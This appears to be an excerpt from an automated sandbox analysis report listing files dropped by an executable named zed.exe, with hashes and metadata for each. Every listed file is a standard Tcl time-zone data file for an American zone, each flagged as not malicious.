                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nassau) $TZData(:America/Toronto)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11373
                                                                                                                                                                                                                                            Entropy (8bit):3.8110553140357086
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:HeohzORhK1a8phYvNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:+uORhK1a8phYloSItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:385C3BDD3E41E5E75CEF0658322B5CDE
                                                                                                                                                                                                                                            SHA1:0334C21C8316ED2EE16FC98B1E8867D5E0916C00
                                                                                                                                                                                                                                            SHA-256:7BA7DA179AA7DF26AC25E7ACCD9BD83784174445285A0D9CCBD7D6A9AA34F4BC
                                                                                                                                                                                                                                            SHA-512:764B680FB8414B5AC8FB110247C19B1004A4453DD2BAC94BF3CFD80281FF3679A5B1D212238509165E022269503ED14A54B0EF73AF7014344752E6A627657D1F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/New_York) {.. {-9223372036854775808 -17762 0 LMT}.. {-2717650800 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-1577905200 -18000 0 EST}.. {-1570381200 -14400 1 EDT}.. {-1551636000 -18000 0 EST}.. {-1536512400 -14400 1 EDT}.. {-1523210400 -18000 0 EST}.. {-1504458000 -14400 1 EDT}.. {-1491760800 -18000 0 EST}.. {-1473008400 -14400 1 EDT}.. {-1459706400 -18000 0 EST}.. {-1441558800 -14400 1 EDT}.. {-1428256800 -18000 0 EST}.. {-1410109200 -14400 1 EDT}.. {-1396807200 -18000 0 EST}.. {-1378659600 -14400 1 EDT}.. {-1365357600 -18000 0 EST}.. {-1347210000 -14400 1 EDT}.. {-1333908000 -18000 0 EST}.. {-1315155600 -14400 1 EDT}.. {-1301853600 -18000 0 EST}.. {-1283706000 -14400 1 EDT}.. {-1270404000 -18000 0 EST}.. {-1252256400 -14400 1 EDT}.. {-123895440
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.799414617322291
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwMueh4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/2905u+p
                                                                                                                                                                                                                                            MD5:B01CC44E5139066F87ADFF16728B98BF
                                                                                                                                                                                                                                            SHA1:4464E187AFF336C9137094308C270BB822974DF1
                                                                                                                                                                                                                                            SHA-256:55C37BF1A579A22A790ADE6585CE95BEC02DA356E84D2EF7832C422A4484FF9D
                                                                                                                                                                                                                                            SHA-512:A45166FFE444982593CBAC3E683D25D9EDB070DB6CD059A83D1C52099F409FFBFE6EA68D255AD000AF142BF8C8D100271531852263677184597877B7BF318847
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nipigon) $TZData(:America/Toronto)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8680
                                                                                                                                                                                                                                            Entropy (8bit):3.965662913874442
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:OrBvOs5vzC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:OrBvOsM9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:9A5F536932FED5A93E2C3DEB81960CD1
                                                                                                                                                                                                                                            SHA1:8E78396D280DD3A9564CEFC7FB722437F3C4D003
                                                                                                                                                                                                                                            SHA-256:8E971C9560CCE548B46626D072E62AB0F4C9682BF6A6ABFB4D0E8D63745402FE
                                                                                                                                                                                                                                            SHA-512:60CFDBCE87F9CD7F27E071D66B97E60F62E56F413DC867BC809490B30D00045D0757710D6B5724148E2A28BD1E45FB662391820E6350D998002BF67B16776645
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nome) {.. {-9223372036854775808 46702 0 LMT}.. {-3225223727 -39698 0 LMT}.. {-2188947502 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1397
                                                                                                                                                                                                                                            Entropy (8bit):3.78056049136398
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5TenykFxCFbF3YCFE2FBCFDFr9CFaFPBCFoF2CFTFKCFDuF1CF2F1CFWFhCFGF3a:5quY9EmFYBosNZNW/bWsBzgCccq7JYN9
                                                                                                                                                                                                                                            MD5:B4F4530FCE4BF5690042A2DA40413D56
                                                                                                                                                                                                                                            SHA1:52D5F2102485F5B326C888A287ED83CA18833BBC
                                                                                                                                                                                                                                            SHA-256:9011C76295E6B17CC1973876B497BEE21B9E6562FB25DF66140F811A1FFA9765
                                                                                                                                                                                                                                            SHA-512:08CAF75226D190D9FF0AA62AD84B13F1BF9047338A690847DF5B448BDB731A877F3E186298AFD704F4F4E133FF3F3128B098F9D90AE9A8E726AE52F84A7DA2E3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Noronha) {.. {-9223372036854775808 -7780 0 LMT}.. {-1767217820 -7200 0 -02}.. {-1206961200 -3600 1 -02}.. {-1191366000 -7200 0 -02}.. {-1175378400 -3600 1 -02}.. {-1159830000 -7200 0 -02}.. {-633823200 -3600 1 -02}.. {-622072800 -7200 0 -02}.. {-602287200 -3600 1 -02}.. {-591836400 -7200 0 -02}.. {-570751200 -3600 1 -02}.. {-560214000 -7200 0 -02}.. {-539128800 -3600 1 -02}.. {-531356400 -7200 0 -02}.. {-191368800 -3600 1 -02}.. {-184201200 -7200 0 -02}.. {-155167200 -3600 1 -02}.. {-150073200 -7200 0 -02}.. {-128901600 -3600 1 -02}.. {-121129200 -7200 0 -02}.. {-99957600 -3600 1 -02}.. {-89593200 -7200 0 -02}.. {-68421600 -3600 1 -02}.. {-57970800 -7200 0 -02}.. {499744800 -3600 1 -02}.. {511232400 -7200 0 -02}.. {530589600 -3600 1 -02}.. {540262800 -7200 0 -02}.. {562125600 -3600 1 -02}.. {571194000 -7200 0 -02}.. {592970400 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8557
                                                                                                                                                                                                                                            Entropy (8bit):3.8810445182855253
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:WEktwmGaLV911sF9A604qSScBgN+4ctDzIVQ/c/3hNxTh:WBwDPPA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:10AF9E9461DD03DA4F0AF0595EB36E6C
                                                                                                                                                                                                                                            SHA1:57AC9BDE3AC665E49D9D2463A4BFA38C053A4A54
                                                                                                                                                                                                                                            SHA-256:D0D8B108453265B60F525A4EC04DE9555087CD6AC5DDBA980B3A96CF0FCD68D1
                                                                                                                                                                                                                                            SHA-512:B6DC7D2709A19B911E086C988DB8346F42DBF7601D9E51E3093C6AF897570E43E5F1C101FE88BC5251F3DCC3B532DB22FFE8A12A4D0151BC52AF3E6DDEA7D23A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Beulah) {.. {-9223372036854775808 -24427 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8557
                                                                                                                                                                                                                                            Entropy (8bit):3.867423227197841
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:ZEktwmGaLV9tZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:ZBwD6fA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:33C03AD65753D7ADB45FC4899B504D1A
                                                                                                                                                                                                                                            SHA1:ED719BB67A64DB49901BA38A945A6BA998646B8D
                                                                                                                                                                                                                                            SHA-256:ABC2B6C97D9E9FBA37AC582ADBA2CE996890D090060E083405D75CDAED9EABE0
                                                                                                                                                                                                                                            SHA-512:69592E8A370C8A5173827500CDDF8190AB44EA87CD7E0C416055CB7958B13A737801EA6B0FFE6032CB3F14F05001BF9DA83E4AEB20F385019B2985ECE7ACB40E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Center) {.. {-9223372036854775808 -24312 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8560
                                                                                                                                                                                                                                            Entropy (8bit):3.879452555978431
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:GEktwmGaLV9nlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:GBwD2fA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:3D3DC12209293086FD843738A4FE87FB
                                                                                                                                                                                                                                            SHA1:8103DFA18B5F3F36AF0B53FA350E0F2D300E6289
                                                                                                                                                                                                                                            SHA-256:8803FF7C81C933B57178B9D3C502FB4268D9AA594A3C638A7F17AF60B12D300D
                                                                                                                                                                                                                                            SHA-512:39BB939780A71B817F82D2B7F56815D33926D150525161051A9950E5A98BA9184670AFC884A1C69D56EADBD6198E3082975448EFBA5FE8A336DB071E6BAB8EF2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/New_Salem) {.. {-9223372036854775808 -24339 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -2160
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7429
                                                                                                                                                                                                                                            Entropy (8bit):3.5470060859729253
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:0ixKXpbzvZ+FxAqe12voJ0euJFNgIHc/QEeF5Z1V8tCSfifK3facfzQWWLQelXuC:0LRJq9LstgV
                                                                                                                                                                                                                                            MD5:FC9CEA4B9654D0957F55CB0E1B25A3E7
                                                                                                                                                                                                                                            SHA1:8BFC3E8CEC34C4087579D3DA727143E3EC045B77
                                                                                                                                                                                                                                            SHA-256:12917DAAA60134BFE56E6979BB27B58A3F295C32BAE02B233E849BCED6B8BCA2
                                                                                                                                                                                                                                            SHA-512:355628F2EFF86605653A1EE7D976CE8B3229A4169D35576F6007FABAB37DD280D8F296EE88BECE3D84D3A1C476F23275D1D77CAF157E9A98672CBF14801D7292
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nuuk) {.. {-9223372036854775808 -12416 0 LMT}.. {-1686083584 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -7200 1 -0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2069
                                                                                                                                                                                                                                            Entropy (8bit):3.994692300159945
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Pe89WU0S+VS+TjV/NF01YluO53ON4Lvf3Pn:5gU033FS1YluOQiLvf3Pn
                                                                                                                                                                                                                                            MD5:0CB80C895BB4BFD36043F1CAAFB604B7
                                                                                                                                                                                                                                            SHA1:2EC2CA1D31EF1804E4EC26F449CA0D3C4F7AA7A0
                                                                                                                                                                                                                                            SHA-256:FC857E4DD0A4AE60A7C56637C752205E20442C7AE62158435BEFCA838174108D
                                                                                                                                                                                                                                            SHA-512:4BE44FF49AC588F1B441AB1B2678F5A0F0B60DB5C69F3F45C7447FC5A0175146F9FF83E132A5256CF7E559809EF7394C23DF9156A295D84D3A67EE917E661EED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Ojinaga) {.. {-9223372036854775808 -25060 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -21
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.970379147398626
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGEu5YfMXGm2OHGf8xYoHv5BidhZvFsc1HRX1va0v:SlSWB9eg/290ZDm2OHDxYoHv5GhZd93p
                                                                                                                                                                                                                                            MD5:AA408A43079EC8933DE271BE3DA2B502
                                                                                                                                                                                                                                            SHA1:421A867DB3FD4779C5F759D0B657D8EB5FB2218B
                                                                                                                                                                                                                                            SHA-256:990213DDE00ADCEB74C8D1ECAF81B9C77963E4AB1F35767F7349236FC8E917DF
                                                                                                                                                                                                                                            SHA-512:1FB740527555A8E128E05709D05720A249BCBA4B6434D00226C07426E6283AA48973F75268F36E6044F0F0650E012781C8E5519B7EA916C625BBF018B29E9961
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Panama) {.. {-9223372036854775808 -19088 0 LMT}.. {-2524502512 -19176 0 CMT}.. {-1946918424 -18000 0 EST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7736
                                                                                                                                                                                                                                            Entropy (8bit):3.8533019559841972
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:tTqPm4bPJWXtRbALtuO/N0HY2iUmUFLqU:Izod
                                                                                                                                                                                                                                            MD5:6BA298F9CEB6406802A01C13313F8EF1
                                                                                                                                                                                                                                            SHA1:D77C113CFA927EF65461781FD080F590C8CFCBB9
                                                                                                                                                                                                                                            SHA-256:1FB962ECC1E5F02E1001C70460FFF720B114554F9AA7956D6DA154DBEA87B4D7
                                                                                                                                                                                                                                            SHA-512:C7F4E2DA503A3167098CFAB7AEC8D75A32D6B081E6777DE7BA3D6B4558D0C44D2CD8A0F1626968295031BABFD2CB96B031B4C00A44F2C554B5B217AE67E69EB4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Pangnirtung) {.. {-9223372036854775808 0 0 -00}.. {-1546300800 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-147902400 -7200 1 ADDT}.. {-131572800 -14400 0 AST}.. {325663200 -10800 1 ADT}.. {341384400 -14400 0 AST}.. {357112800 -10800 1 ADT}.. {372834000 -14400 0 AST}.. {388562400 -10800 1 ADT}.. {404888400 -14400 0 AST}.. {420012000 -10800 1 ADT}.. {436338000 -14400 0 AST}.. {452066400 -10800 1 ADT}.. {467787600 -14400 0 AST}.. {483516000 -10800 1 ADT}.. {499237200 -14400 0 AST}.. {514965600 -10800 1 ADT}.. {530686800 -14400 0 AST}.. {544600800 -10800 1 ADT}.. {562136400 -14400 0 AST}.. {576050400 -10800 1 ADT}.. {594190800 -14400 0 AST}.. {607500000 -10800 1 ADT}.. {625640400 -14400 0 AST}.. {638949600 -10800 1 ADT}.. {657090000 -14400 0 AST}.. {671004000 -10800 1 ADT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):253
                                                                                                                                                                                                                                            Entropy (8bit):4.784405839512086
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290olofDm2OHekeoHXFIV/1Vw/9vVOzFZg/VVFAKV:MB86290oloLmdHeVCXqV/k/9v4zW/OW
                                                                                                                                                                                                                                            MD5:BFCE7E2618D6935031D6941AD6DDD8E3
                                                                                                                                                                                                                                            SHA1:1953CD224FB2363B10372C0476760F3FB020CB00
                                                                                                                                                                                                                                            SHA-256:B3EE44B3526BEDFC25B806371D3C465FDBD6CC647F30BF093750651E4A0C1BE4
                                                                                                                                                                                                                                            SHA-512:31262DF034E084DA4CDB57B99178594C29129F61F3535E5D8245B8BB4AB6BF314307B0F5E58B74C349684CD761C9CDE44EB10407FB135BA6427D3D1E9DA99B40
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Paramaribo) {.. {-9223372036854775808 -13240 0 LMT}.. {-1861906760 -13252 0 PMT}.. {-1104524348 -13236 0 PMT}.. {-765317964 -12600 0 -0330}.. {465449400 -10800 0 -03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):496
                                                                                                                                                                                                                                            Entropy (8bit):4.444598497301421
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290OXmdH514YCvb8o1W4S9xRvhhHRVxORBYUNv:5tekdvYP1x52yq
                                                                                                                                                                                                                                            MD5:062ECA57C0B795780240CD7AFE70BDA0
                                                                                                                                                                                                                                            SHA1:89D71A11DD8D4E000F7FADBDDC77C4C1DC1195F7
                                                                                                                                                                                                                                            SHA-256:DFA0EC91804B789A1A7E1B1977710435D2589A5B54C1579C8E1F5BF96D2FD007
                                                                                                                                                                                                                                            SHA-512:7D123AA872E0B8286A26E338AE0F8E0D7A6F0F2EA8B1EBEC6DBB59477C812985CB246AD397D0901A58FDB7FF14171CF60169DC15C538B95C58BD2D46106A7A4D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Phoenix) {.. {-9223372036854775808 -26898 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-820519140 -25200 0 MST}.. {-796841940 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-56221200 -25200 0 MST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6613
                                                                                                                                                                                                                                            Entropy (8bit):3.8549788442269395
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5Ux+E2p3T6ZqrNSMEBPMcywh4NF5zCC7IOTWa1HW1241UWK9BDL+3XC4BMrS2LxP:KOfS0HY2iU7KKdFL6Aa2K4gSLf8e
                                                                                                                                                                                                                                            MD5:A720323DF122C70C1530788DB24700BA
                                                                                                                                                                                                                                            SHA1:20674BD7D84CC686ABBB5D6B36B520A5E9C813ED
                                                                                                                                                                                                                                            SHA-256:A89C580899AD2FF8DF45A783BB90D501DC32C28B92931CA18ABD13453E76244B
                                                                                                                                                                                                                                            SHA-512:02B71E537B9FDAF1B68E381F0007CCBBA53EB70719ED38F51B56C5BFA64C7E3D9797053C9DE3A920E5CAFA09BBC062FCED62B5D6B9213AFA8286B95DEDAB0532
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Port-au-Prince) {.. {-9223372036854775808 -17360 0 LMT}.. {-2524504240 -17340 0 PPMT}.. {-1670483460 -18000 0 EST}.. {421218000 -14400 1 EDT}.. {436334400 -18000 0 EST}.. {452062800 -14400 1 EDT}.. {467784000 -18000 0 EST}.. {483512400 -14400 1 EDT}.. {499233600 -18000 0 EST}.. {514962000 -14400 1 EDT}.. {530683200 -18000 0 EST}.. {546411600 -14400 1 EDT}.. {562132800 -18000 0 EST}.. {576050400 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607500000 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638949600 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671004000 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {702453600 -14400 1 EDT}.. {719992800 -18000 0 EST}.. {733903200 -14400 1 EDT}.. {752047200 -18000 0 EST}.. {765352800 -14400 1 EDT}.. {783496800 -18000 0 EST}.. {796802400 -14400 1 EDT}.. {814946400 -18000 0 EST}.. {828856800 -14400 1 EDT}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):207
                                                                                                                                                                                                                                            Entropy (8bit):4.919510214047913
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290e7490ppv:MByMYbpwt290190b
                                                                                                                                                                                                                                            MD5:4AB394CB233B101627136EB5E070CF9B
                                                                                                                                                                                                                                            SHA1:F00600CD2DB10FE157C3696F665B9759EEA85F99
                                                                                                                                                                                                                                            SHA-256:A4952380C89A6903FFE5BF8707B94B1BB72568FFD03DB04BF4D98E38AC82EEB7
                                                                                                                                                                                                                                            SHA-512:58F4AD08FA10F1884FA641C4EA778C0FC013EABBD68DF5DE04D5B301227396260C3D669DB33DD6A6B33F1550C24BBD7777D756DF0D61CEEAF5EC6541EDFA296C
                                                                                                                                                                                                                                            Malicious:false
